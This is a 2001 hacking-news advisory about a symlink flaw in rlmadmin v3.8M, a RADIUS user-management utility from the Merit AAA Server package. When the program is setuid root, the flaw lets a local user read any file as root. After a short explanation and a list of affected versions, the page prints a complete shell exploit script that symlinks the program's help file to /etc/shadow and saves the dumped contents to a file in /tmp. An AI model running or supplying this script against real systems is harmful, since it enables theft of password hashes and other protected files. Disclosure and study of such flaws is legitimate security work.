Users login

Create an account »


Users login

Home » Hacking News » rlmadmin v3.8M view file symlink vulnerability

rlmadmin v3.8M view file symlink vulnerability

by Majik on September 7th, 2001 Rlmadmin is a user management utility for RADIUS which comes with the Merit AAA Server package ( Using this program and a simple symlink, you can view any file on the system as root.


Using the -d option of rlmadmin allows you to specify the directory

in which it will look for its configuration files.

The files that it looks for in this directory during startup are:

dictionary - dictionary translations for parsing requests and

generating responses. - the help file that is displayed on startup.

vendors - vendor specific information.

The problem occurs when rlmadmin reads from the "" file.

If this file is symlinked to another file (such as /etc/shadow), the

program blindly follows the link, causing the contents of the file to

be displayed when the program starts up.

Versions Affected:


rlmadmin v3.8M (and earlier?)

rlmadmin v5.01 Commercial (available from -

this version isn't setuid root by default,

but is still affected if set by the admin)

Exploit Code:



# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #

# rlmadmin view file symlink vulnerability #

# (c)oded 2001 Digital Shadow #

# #

# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #

bloc=/usr/private/etc # executable file location

cloc=/usr/private/etc/raddb # config file location

file=/etc/shadow # file to read

echo == rlmadmin exploit - visit for more!

echo = Initialising...

mkdir /tmp/peace; cd /tmp/peace

cp $cloc/dictionary $cloc/vendors .

ln -s $file

echo = Exploiting...

echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log

mv peace.log /tmp; rm dictionary vendors

echo = Done!

echo == Now look in /tmp/peace.log!



Vulnerability discovered by Digital Shadow.

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.


Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »